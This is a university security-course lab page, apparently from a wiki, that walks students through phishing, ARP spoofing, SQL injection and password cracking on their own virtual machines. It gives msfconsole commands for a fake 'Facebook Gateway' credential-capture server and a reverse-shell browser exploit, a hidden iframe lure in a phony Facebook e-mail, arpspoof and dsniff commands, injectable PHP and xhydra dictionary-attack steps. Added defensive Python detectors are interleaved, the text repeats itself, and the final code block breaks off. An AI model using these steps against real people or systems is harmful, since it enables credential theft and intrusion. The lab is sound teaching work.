Difference between revisions of "SEC520/labs/Lab 4"
<h2> <span class="mw-headline">Objectives</span></h2>
<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertently activate (trigger) HTML code that accesses a vulnerable server via a web-browser.
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information from a connection between computers.
</li><li>Access and manipulate a database server to gain access into the targeted server.
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
</li></ol>
<p><br>
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>
<ul>
<li> <b>SATA Hard Disk</b> (in removable disk tray).
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3]
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Online Tools and References</span></h2>
<ul>
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
</ul>
<p><br>
</p>
<h2> <span class="mw-headline">Course Notes</span></h2>
<ul>
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] (YouTube Videos)</li>
</ul>
<p><br>
</p>
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
<br>
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers
requires the permission of the server owner (preferably in writing). Students
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
<br>
<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
<br>
This section will demonstrate the vulnerability of a computer system
through one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack, hosted on your server, that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
<br>
INSTRUCTIONS:
<br /><br />
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
<br /><br />
In this section, we will be using <b>msfconsole</b> to issue commands that exploit the target via its web-browser. Before we start, we should update our Metasploit Framework, replacing the older version that came with our Kali Linux edition with a new version:
<br /><br />
{{Admon/tip|Using The MSF Console|
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in msfconsole than using Metasploit GUIs like Armitage!<br /><br />
We will be running the <b>msfconsole</b> command to access the command shell, and set up a typical phishing attack.
|}}
<br />
<ol>
<li>Login as <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore the error; the console should eventually load). If problems persist, check to see if the Metasploit server is running.<br>
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
<br /></li>
</ol>
<pre>
use auxiliary/server/capture/http_basic
show options
set REALM Facebook Gateway
set URIPATH /
run
</pre>
<ol>
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
<li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a Windows dialog box.</li>
</ol>
{{Admon/important|Disable Internet Explorer Enhanced Security|
<ol>
<li value="5">Switch to your vulnerable Windows server, and make certain that you are logged in as <b>Administrator</b>.</li>
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Uncheck the checkboxes for administrators and all other users and then click <b>Next</b>.</li>
<li>Log in to a regular user account and open a web-browser.</li>
<li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box.</li>
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Were you able to determine the username and password?</li>
<li>Did you think it would be harder to exploit a machine in this way?</li>
<li>How popular do you think this type of human-based attack is?</li>
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
<li>Record your findings in your lab log-book.</li>
</ol>
<br /><br />
Here is how simple (subtle) it can be:<br /><br />
<ol>
<li>Perform a Google search on using msfconsole to set up a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li>
<li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy, having yielded details such as e-mail usernames and facebook accounts).</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> <iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"> </iframe>
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification). You could simulate this attack for demonstration by creating the html file on your Windows server, and loading this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the &lt;iframe&gt; element.</li>
</ol>
|}}
<br />
<ol>
<li value="14">Proceed to Task #2</li>
</ol>
<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
</p>
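As an added defensive example (not part of the lab or of the Metasploit tooling it uses), the following Python script shows how a mail gateway or content filter could flag the lure used in this task: an iframe that is invisible (zero width or height, or display:none) or that points at a bare IP address rather than a hostname. The sample HTML, and the address 192.0.2.10 standing in for ATTACK_SERVER_IP_ADDRESS, are constructed for the example.

```python
"""Flag hidden or off-site <iframe> elements in an HTML e-mail or page."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in the document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_zero(value):
    """True for size attributes such as '0', '0px' or '0%'."""
    stripped = value.strip().lower().rstrip("px%").strip()
    try:
        return float(stripped) == 0
    except ValueError:
        return False


def _host_is_ip(src):
    """True when the iframe src names a bare IP address instead of a hostname."""
    parsed = urlparse(src if "://" in src else "http://" + src)
    try:
        ipaddress.ip_address(parsed.hostname or "")
        return True
    except ValueError:
        return False


def suspicious_iframes(html):
    """Return one (reasons, src) tuple per iframe that looks like a lure."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if _is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", "")):
            reasons.append("zero-size frame")
        if "display:none" in attrs.get("style", "").replace(" ", ""):
            reasons.append("display:none frame")
        if _host_is_ip(src):
            reasons.append("src is a bare IP address")
        if reasons:
            findings.append((", ".join(reasons), src))
    return findings


# Constructed sample lure, modelled on the lab's iframe. 192.0.2.10 is a
# documentation address used here in place of ATTACK_SERVER_IP_ADDRESS.
SAMPLE_LURE = """
<html><body>
<p>You have 1 new Facebook notification.</p>
<iframe src="http://192.0.2.10/" width="100" height="0"> </iframe>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for reasons, src in suspicious_iframes(SAMPLE_LURE):
        print(f"SUSPICIOUS iframe -> {src}: {reasons}")
```

The visible example.com frame passes; the zero-height frame pointing at a raw address is reported with both reasons. A filter built on this would quarantine the message or strip the element before delivery.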
<p><br>
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"
into communicating with a server that it assumes has the correct MAC
address. The attacker can then <b>"feed packets"</b> to the destination, allowing for an uninterrupted session in which information such as usernames and passwords can be obtained.
<br><br>
INSTRUCTIONS:
</p><ol>
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
<li>Note the IP Address of your Windows server.
</li><li>Make certain that your Windows machine is running an FTP
server. Set up the FTP server to only allow users to access the FTP
server by username and password (possibly not required from default installation and startup).</li>
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR</b><br><br> </li>
<li>We need to continue the "man in the middle" attack by now
performing the same manoeuvre for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following
Linux command: <br><br><b>sudo arpspoof -t LINUX_IP_ADDR WINDOWS_IP_ADDR</b><br><br></li>
<li>Switch first to your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
</ol>
<br>
<ol>
<li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:<br><br><b>sudo su</b> # login with admin password<br /><b> echo 1 > /proc/sys/net/ipv4/ip_forward</b><br><br>(This sets IP FORWARDING to "True" or "On")<br><br></li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
</ol>
{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there
is an abundance of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}
<br>
<ol>
<li value="14">On an available shell terminal on your host (attack) server, issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate the dsniff superuser executable)</li>
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
</ol>
{{Admon/important|FTP Doesn't Work / Alternative Arp Poisoning Method|

<ol>
<li value="17">Then switch back to your host (attack) server.</li>
<li>What do you notice? Is this information sufficient to log on as a Windows system user? Record your findings in your lab log-book.</li>
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
<li>Record your findings/answers in your lab log-book.</li>
<li>Proceed to Task #3</li>
</ol>
<p><b>Answer Task #2 observations / questions in your lab log book.</b>
</p><p><br>
</p>
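One answer to the question of what a security analyst can do about this attack is to watch the ARP cache for the two symptoms that arpspoof produces: an IP address whose MAC suddenly changes, and a single MAC (the Kali host's) that answers for both WINDOWS_IP_ADDR and LINUX_IP_ADDR. The following Python monitor, an added example that is not part of the lab or of dsniff/arpspoof, applies both checks to a stream of observed ARP replies. The replies, addresses and MACs are constructed for the example (192.0.2.20 for the Windows VM, 192.0.2.30 for the Linux VM, 192.0.2.99 for the Kali host).

```python
"""Detect ARP cache poisoning from a sequence of observed ARP replies."""
from collections import defaultdict


def detect_arp_poisoning(replies, allowed_shared=None):
    """Check (timestamp, ip, mac) tuples in arrival order and return alert strings.

    Two rules are applied:
      1. an IP that was previously bound to a different MAC raises an alert;
      2. a MAC that starts answering for more than one IP raises an alert,
         unless it is listed in `allowed_shared` (e.g. a router that legitimately
         owns several addresses).
    """
    allowed_shared = {m.lower() for m in (allowed_shared or [])}
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"{ts}: {ip} moved from {previous} to {mac}")
        ip_to_mac[ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        # alert only when the set of IPs behind this MAC grows past one
        if len(mac_to_ips[mac]) > max(before, 1) and mac not in allowed_shared:
            alerts.append(f"{ts}: {mac} now answers for {sorted(mac_to_ips[mac])}")
    return alerts


# Constructed ARP replies as a LAN sensor might log them. The last two mirror
# the lab's pair of arpspoof commands: both VMs are re-bound to the Kali MAC.
SAMPLE_REPLIES = [
    ("10:00:01", "192.0.2.20", "00:0c:29:aa:aa:aa"),  # Windows VM
    ("10:00:01", "192.0.2.30", "00:0c:29:bb:bb:bb"),  # Linux VM
    ("10:00:02", "192.0.2.99", "00:0c:29:cc:cc:cc"),  # Kali host
    ("10:00:05", "192.0.2.30", "00:0c:29:cc:cc:cc"),  # arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR
    ("10:00:05", "192.0.2.20", "00:0c:29:cc:cc:cc"),  # arpspoof -t LINUX_IP_ADDR WINDOWS_IP_ADDR
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print("ALERT", alert)
```

The first three replies produce no alerts; the two poisoned replies produce four (two "moved" alerts and two "answers for" alerts). On a real network the input would come from a sniffer, and static ARP entries for the gateway, or switch-level dynamic ARP inspection, would be the preventive counterpart to this detection.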
INSTRUCTIONS:
<ol>
<li>Study the following PHP code below: </li>
</ol>
<pre> <?php

// Untrusted value taken straight from the login form
$user = $_POST['usr'];

// Suppose the attacker submits this as the username:
//   anything' OR x='x
// The single quote closes the string literal in the query and the OR clause
// makes the WHERE condition true for every row.

// $user is concatenated directly into the SQL string, so the query sent becomes:
//   SELECT user,password FROM users WHERE user='anything' OR x='x'
mysql_query("SELECT user,password FROM users WHERE user='$user'");

?>
</pre>
<br>
<ol>
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
<li>View the associated <b>YouTube</b> video in the resources above, and try to briefly explain why this type of attack could work. Write your explanation in your lab log-book.</li>
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour):</li>
</ol>
<pre> <?php

// mysql_real_escape_string() backslash-escapes quote characters, so the
// attacker's single quote can no longer terminate the string literal
$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;

// The same attacker input now arrives as:
//   anything\' OR x=\'x
// and the query compares the user column against that literal text,
// which matches no row:
mysql_query("SELECT user,password FROM users WHERE user='$user'");

// Note: the mysql_* functions were removed in PHP 7. Current code should use
// mysqli or PDO prepared statements, which keep data out of the SQL string
// entirely rather than relying on escaping.

?>
</pre>
<ol>
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
<li>Proceed to Task #4.</li>
</ol>
<p><b>Answer Task #3 observations / questions in your lab log book.</b>
</p><p><br>
</p>
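To make the defect and its fix concrete outside PHP, here is an added example (not the lab's code) that rebuilds the same login query in Python with the standard-library sqlite3 module. The vulnerable function concatenates the username into the SQL string exactly as the lab's mysql_query() call does; the hardened function passes it as a bound parameter, which is the modern equivalent of the escaping fix. The in-memory users table and its rows are constructed for the example, and the always-true input uses the quoted form 'x'='x so that it runs without a column named x.

```python
"""Vulnerable vs. parameterized login lookup, demonstrated with sqlite3."""
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the lab's database.
    Passwords are stored in clear text only so the query results are visible;
    a real table would hold salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cr3t"), ("bob", "hunter2")],
    )
    return conn


def lookup_vulnerable(conn, user):
    """Mirrors mysql_query("... WHERE user='$user'"): the value is spliced into
    the SQL text, so quote characters in it change the query's structure."""
    query = f"SELECT user, password FROM users WHERE user='{user}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user):
    """The driver sends the value separately from the SQL text, so a quote in
    the input is just a character inside the compared string."""
    return conn.execute(
        "SELECT user, password FROM users WHERE user=?", (user,)
    ).fetchall()


# Constructed attacker input, in the spirit of the lab's "anything' OR x='x"
INJECTED_USERNAME = "anything' OR 'x'='x"

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable:    ", lookup_vulnerable(conn, INJECTED_USERNAME))
    print("parameterized: ", lookup_parameterized(conn, INJECTED_USERNAME))
    print("legitimate:    ", lookup_parameterized(conn, "alice"))
```

The vulnerable lookup returns every row of the table for the injected username, the parameterized lookup returns nothing for it, and a legitimate username still resolves normally.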
INSTRUCTIONS:
<ol>
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
<li>How could you obtain usernames (eg. e-mail usernames) for a targeted computer system? (Review your labs and notes from the Reconnaissance Phase.) Record your answer in your lab log-book.</li>
<li>Assuming that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase, we will now use a tool to gain access to the account on the targeted Windows server.<br /><br /></li>
{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
<br>
<li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a web search in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.<br /><br /></li>
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
{{Admon/important|xhydra|xhydra is a graphical frontend of a program
that scans open ports, and attempts to crack account passwords that are
weak using a dictionary file of potential passwords. Of course, you
could have performed this task manually by using <b>nmap</b> to scan open ports, and used other password cracking tools (such as <b>Cain and Abel</b>), but <b>xhydra</b> performs these operations automatically.|}}
<br>
<li value="6">To launch the xhydra application as root (unless you are already root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
<li>In the initial application window (i.e. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains the common passwords you downloaded and decompressed.</li>
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
<li>This attack may take several minutes to complete.</li>
<li>Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.<br><br></li>
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unprivileged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
For example, with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privileges and gaining access to the <b>/etc/shadow</b> file to attempt to crack the root password hash (via the <b>John the Ripper</b> utility).
|}}
<br>
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
<br />
{{Admon/important|Sharpening Your Skills (hackthissite.org)|

|}}
<br />
<li value="19">Record your findings in your lab log-book.</li>
<li>Proceed to the "Completing the Lab".</li>
</ol>
<p><b>Answer Task #4 observations / questions in your lab log book.</b>
</p><p><br>
</p>
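The password-rules question above has a mechanical answer: reject at creation time exactly what the xhydra run tries, namely the word list, the empty password and the login name as password, plus the trivial variants (appended digits, leet substitutions) that cracking rule sets generate from each dictionary word. The following Python checker is an added example, not part of the lab or of xhydra; SAMPLE_WORDLIST is a constructed six-word stand-in for /root/cain.txt, and the 12-character minimum is an assumed policy value.

```python
"""Reject passwords that a dictionary attack such as the lab's xhydra run would find."""
import re

# Constructed stand-in for cain.txt; a deployment would load the real list
SAMPLE_WORDLIST = {"password", "letmein", "welcome", "qwerty", "monkey", "dragon"}

MIN_LENGTH = 12  # assumed policy value

# Undo the common letter/digit substitutions a cracker's rules would apply
_UNLEET = str.maketrans("@01345$", "aoleass")


def _candidates(password):
    """Forms of the password a dictionary attack would effectively test."""
    base = password.lower()
    stripped = re.sub(r"[\d\W_]+$", "", base)      # drop trailing '123', '!', etc.
    stripped = re.sub(r"^[\d\W_]+", "", stripped)  # ...and leading ones
    unleet = stripped.translate(_UNLEET)           # p@ssw0rd -> password
    return {base, stripped, unleet}


def password_problems(username, password, wordlist=SAMPLE_WORDLIST):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    if password == "":
        problems.append("empty password")            # xhydra: Try Empty Password
    if password.lower() == username.lower():
        problems.append("password equals username")  # xhydra: Try login as password
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    for variant in _candidates(password):
        if variant in wordlist:
            problems.append(f"dictionary word '{variant}'")  # xhydra: passwords list
            break
    return problems


if __name__ == "__main__":
    for candidate in ["", "weak", "Monkey123!", "P@ssw0rd2023", "correct horse battery staple"]:
        print(repr(candidate), "->", password_problems("weak", candidate) or "OK")
```

The lab's "weak" account would fail on length and, if it used a dictionary word, on the word-list check; "P@ssw0rd2023" fails despite its length because stripping the year and undoing the substitutions leaves "password". Pairing a check like this with account lockout or rate limiting on the FTP service addresses the online guessing that xhydra performs.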
</p>
<ol>
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
<li>Demonstration of <b>prevention from Data Injection Attack</b>.</li>
<li>Completed Lab 4 notes.</li>
</ol>
<p><br>
<ol>
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
<li>Define the term <b>Man in the Middle</b> attack.</li>
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
</ol>
Latest revision as of 15:00, 21 July 2023
Types of Attacks
Introduction
In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (eg. Metasploit) to gain access to your Windows server.
In this lab, students will learn other methods of vulnerability testing to gain access to vulnerable servers:
- This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
- First, students will be exposed to Client-side attacks (usually initiated by the server's users) including Malicious web-page Payloads, and IP Spoofing (Man in the Middle) attacks.
- Then, students will focus on Server-side attacks such as Server-side Injection, and Password attacks.
Objectives
- Access a server by creating a webpage using the <iframe> tag to redirect a user to a Metasploit exploit in order to gain access to the computer system.
- Understand how phishing can be used to have the user inadvertantly activate (trigger) HTML code to access a vulnerable server via a web-browser.
- Perform IP Spoofing (Man in the Middle) attacks in order to obtain useful information between a connect between computers.
- Access and manipulate a database server to gain access into the targeted server.
- Use a password cracking program to discover and access user accounts, and possibly root access.
Required Materials (Bring to All Labs)
- SATA Hard Disk (in removable disk tray).
- Lab Logbook (Lab6 Reference Sheet) (to make notes and observations).
Prerequisites
Online Tools and References
Course Notes
- odp | pdf | ppt (Slides: Types of Attacks)
- Phishing | Malicious Payload | IP Spoofing | Database Injection (YouTube Videos)
Performing Lab 4
Task #1: Web-browser Redirect (Phishing) Attacks
This section will demonstrate the vulnerability of a computer system
with one of its weakest links: Humans. You will be using the Metasploit framework to create an attack on your server that will exploit and gain access to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
INSTRUCTIONS:
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the Armitage frontend, other strategies such as lurking to gain access (via reverse shell) by redirecting web-browser traffic are also available.
In this section, we will be using the mfs-console to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
- Login as root user, and issue the command: msfconsole (ignore error, console should eventually load). If problems persist check to see if the Metasploit server is running.
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
- In the msfconsole, issue the following commands (one per line):
    use auxiliary/server/capture/http_basic
    show options
    set REALM Facebook Gateway
    set URIPATH /
    run
- Note the LOCAL IP ADDRESS. You will be entering that address in a web-browser on your targeted Windows server.
- Your attack server (running Metasploit) is now "lurking" until the user enters data in a windows dialog box.
- Switch to your vulnerable Windows server, make certain that you are logged in as Administrator.
- Open the Control Panel, select Add or Remove Programs, select Add/Remove Windows Components. Click to select Internet Explorer Enhanced Security Configuration and click Details. Unclick the checkboxes for admin and all other users and then click Next.
- Login into a regular user account and open a web-browser.
- Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box.
- Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Were you able to determine the username and password?
- Did you think it would be harder to exploit a machine in this way?
- How popular do you think this type of human-based attack is?
- How can you prevent this type of attack from occurring on a "hardened system"?
- Record your findings in your lab log-book.
- Proceed to Task #2
Answer the Task #1 observations / questions in your lab log book.
Task #2: IP Spoofing (Man in the Middle) Attacks / Packet Sniffing
This section will demonstrate an IP Spoofing attack (sometimes referred to as "ARP poisoning") where the target server is "tricked" into communicating with a server that it assumes has the correct MAC address. The attacker can then "feed packets" to the destination, allowing for an uninterrupted session in which to obtain information such as usernames and passwords.
INSTRUCTIONS:
- We will be using your Kali Linux host machine, Vulnerable Windows VM, and Vulnerable Linux VM for this section.
- Note the IP Address of your Windows server.
- Make certain that your Windows machine is running an FTP server. Set up the FTP server to only allow users to access the FTP server by username and password (possibly not required from default installation and startup).
- For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: ping LINUX_IP_ADDR -t
You should now see proof of a connection between your vulnerable Windows and Linux servers.
- Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.
- Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: ping WINDOWS_IP_ADDR
- We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.
- Switch to your Kali Linux (host) server, and open a shell terminal.
- While in the host (attack) machine, issue the following Linux command:
sudo arpspoof -t WINDOWS_IP_ADDR LINUX_IP_ADDR
- We need to continue the "man in the middle" attack by now performing the same maneuver for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following Linux command:
sudo arpspoof -t LINUX_IP_ADDR WINDOWS_IP_ADDR
- Switch first to your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.
- To complete the "man in the middle" attack, you are required to establish IP FORWARDING. Open another shell window in your host (attack) machine, and issue the following Linux command in your attack host:
sudo su # login with admin password
echo 1 > /proc/sys/net/ipv4/ip_forward
(This means to set IP FORWARDING to "True" or "On")
- Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.
- On an available shell terminal on your host (attack) server, issue the following Linux command: dsniff
(tip: Use the command: find -P . | grep dsniff to locate the dsniff superuser executable)
- This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.
- Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.
- Then switch back to your host (attack) server.
- What do you notice? Is this information sufficient to logon as a Windows system user? Record your findings in your lab log-book.
- Return to your vulnerable Linux server, and close the FTP connection with the Windows server.
- Switch back to your attack server. What information does dsniff provide?
- What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?
- Record your findings/answers in your lab log-book.
- Proceed to Task #3
Answer Task #2 observations / questions in your lab log book.
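The two arpspoof commands above leave a footprint on the network that a defender can watch for. The following is an added example (not part of the lab or its tools): a small monitor that replays a constructed sequence of ARP replies for a hypothetical lab network and flags the poisoning pattern, the way arpwatch-style tools do.

```python
"""Added example (not part of the lab): spot the ARP-cache poisoning pattern
that the two arpspoof commands in Task #2 create.

arpspoof sends forged ARP replies so that each victim maps the other victim's
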